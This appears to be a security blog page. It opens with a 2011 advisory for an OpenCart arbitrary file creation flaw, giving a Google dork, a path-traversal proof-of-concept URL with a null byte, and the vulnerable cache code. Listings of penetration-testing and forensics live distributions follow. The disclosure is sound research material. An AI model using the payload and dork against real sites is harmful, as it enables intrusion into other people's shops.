OpenCart Arbitrary File Creation (All versions)


# Exploit Title: OpenCart Arbitrary File Creation (All versions)
# Google Dork: “Powered By OpenCart”
# Date: 2011-09-06
# Author: dhson (danghaison(at)gmail.com)
# Software Link: http://www.opencart.com/index.php?route=download/download
# Version: All version


PoC

http://www.site.com/index.php?country_id=/../../../demo.php%00&route=account/register/zone&zone_id=1

—————
Vulnerable code
—————

public function set($key, $value) {
$this->delete($key);

$file = DIR_CACHE . ‘cache.’ . $key . ‘.’ . (time() + $this->expire);

$handle = fopen($file, ‘w’);

fwrite($handle, serialize($value));

fclose($handle);
}

Katana


Katana is a portable multi-boot security suite which brings together many of today’s best security distributions and portable applications to run off a single Flash Drive. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal. Katana also comes with over 100 portable Windows applications; such as Wireshark, Metasploit, NMAP, Cain & Abel, and many more.

Source: http://www.hackfromacave.com/

Categories: Security Distribution

WEAKERTHAN Linux


…just released backtrack 5 and i noticed they dont have much wireless tools as they had in backtrack 4…as i said before weaknet is still always on top of every os out there, hope ur still working on ur fine project because its worth it.

Source: http://weaknetlabs.com/main/?page_id=479

Matriux Live CD


The Matriux is a phenomenon that was waiting to happen. It is a fully featured security distribution consisting of a bunch of powerful, open source and free tools that can be used for various purposes including, but not limited to, penetration testing, ethical hacking, system and network administration, cyber forensics investigations, security testing, vulnerability analysis, and much more. It is a distribution designed for security enthusiasts and professionals, although it can be used normally as your default desktop system.

With Matriux, you can turn any system into a powerful penetration testing toolkit, without having to install any software into your hardisk. Matriux is designed to run from a Live environment like a CD / DVD or USB stick or it can easily be installed to your hard disk in a few steps. Matriux also includes a set of computer forensics and data recovery tools that can be used for forensic analysis and investigations and data retrieval.

Source: http://www.matriux.com

EmErgE’s MultiISO LiveDVD


MultiISO LiveDVD is an integrated Live DVD technology which combines some of the very popular Live CD ISOs already available on the internet. It can be used for security reconnaissance, vulnerability identification, penetration testing, system rescue, media center and multimedia, system recovery, etc

Source: http://badfoo.net

Categories: Security Distribution

Hacking-Lab LiveCD

22/05/2011 1 comment

The LiveCD is based on Ubuntu with a KDE desktop. The LiveCD includes:
Easy Access to Hacking-Lab Remote (OpenVPN)
Mini Wiki
Security Tool Suite : ( Forensic Tools ,Metasploit ,Source Code Analysis ,Fuzzer Tools ) and many more.

  lcd1

Source: http://www.hacking-lab.com/events/livecd-beta-tester.html

Categories: Security Distribution

WINTAYLOR


WinTaylor is the new forensic interface built for Windows and included in CAINE Live CD. It is written in Visual Basic 6 to maximize compatibility with older Windows systems, and provides an internal set of well-known forensic programs.

WinTaylor proposes a simple and complete forensic software integration and inherits the design philosophy of CAINE.
To ensure transparency of the operations performed by WinTaylor during its execution, we have made available the source code of the program, that is licensed under the Lesser GPL License 2.1. The code is visible and editable, for the benefit of developers and to preserve the good standards of open source forensic software.
The interface is structured in the familiar CAINE’s tabs style, and implements the well-known reporting system to record the investigative sessions.

Features

  • Report creation tool, that saves in a plain and portable text file the list of used programs with time-stamps .
  • Tabbed structure that gives a logical schema to the investigation process.
  • Command-line tools that print their output inside WinTaylor.
  • Updated Sysinternals tools
  • Versatile hashing tool
  • Snapshot tool

Source: http://www.caine-live.net/page5/page5.html

Categories: Security Distribution